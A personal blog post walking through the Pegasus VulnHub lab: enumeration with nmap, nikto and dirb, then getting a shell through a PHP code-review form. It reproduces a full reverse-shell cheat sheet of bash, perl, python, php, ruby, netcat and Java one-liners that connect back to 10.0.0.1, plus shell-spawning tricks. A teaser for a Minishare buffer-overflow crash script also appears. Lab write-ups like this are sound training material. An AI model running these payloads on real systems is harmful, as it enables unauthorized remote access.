Analyzing Pegasus VM

Hello everyone,


This is my first article. I hope it goes well. Here I will try to solve Pegasus VM found @  https://www.vulnhub.com/entry/pegasus-1,109/



Following are the first 3 steps I used for enumeration:

1) Run Nmap (Port scanner)
2) Run Nikto (Application scanner)
3) Run dirb (directory buster)

Enumeration:


1) Initially I ran nmap with -sn (Ping sweep) to determine all the alive host in the segment.
Then scanned the IP with -A and -sV to enumerate further.

Got the open ports, services running on those ports.
 Lets check the website hosted.

2) Run nikto web application scanner for enumeration:

Nikto didn't help much this time. Except for platform information PHP/5.3.10-1ubuntu3.15

3) Run dirb as shown in the following screenshot for enumeration:

dirb didn't really help. After some manual analysis I came to know that the application sends back image for any random request.

And a file not found response when the extension .php is added to it.


After using dirb, directory buster and wfuzz with different wordlist I found the following.
It clearly states, whatever we enter in the textarea will be reviewed by Mike.
First thing that I can think of was to insert a php bind shell as enumerated by Nikto.

Submitted the code here.



Got the following error.


Then I tried the following shell codes form http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.0.0.1 1234
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Still no result then I tried a shell code from http://packetstormsecurity.com/files/11058/bindshell.c.html

After that I tried nc for connecting to the port and finally I got the shell.


Then I tried to spawn a stable shell. Reference http://netsec.ws/?p=337
Shell Spawning
  • python -c 'import pty; pty.spawn("/bin/sh")'
  • echo os.system('/bin/bash')
  • /bin/sh -i
  • perl —e 'exec "/bin/sh";'
  • perl: exec "/bin/sh";
  • ruby: exec "/bin/sh"
  • lua: os.execute('/bin/sh')
  • (From within IRB)
    exec "/bin/sh"
  • (From within vi)
    :!bash
  • (From within vi)
    :set shell=/bin/bash:shell
  • (From within nmap)
    !sh
And I got an interactive and stable shell form the exploited machine .



Comments

Post a Comment

Popular posts from this blog

MY OSCP REVIEW

Image
MY OSCP REVIEW About me I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai. Inspiration to do OSCP Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security. And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less. So I asked few question on some group in facebook regarding How can I learn more exploitation stuff. There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I...
Read more

Minishare 1.4.1 Bufferoverflow

Image
You can download the server from: https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0 Exploit code in ruby: https://www.exploit-db.com/exploits/616/ The vulnerability is a long URL in the GET request. Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1 Lab Setup: 1) Windows xp ( I am using windows xp sp1) 2) Immunity debugger installed on the windows xp machine. 3) Minishare 1.4.1 installed on windows xp running on port 80. 2) Kali linux for scripting and exploiting. Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below. Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script. #!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"*2000 buff+=" HTTP/1.1\r\n\r\n" s.send(buff) s.close...
Read more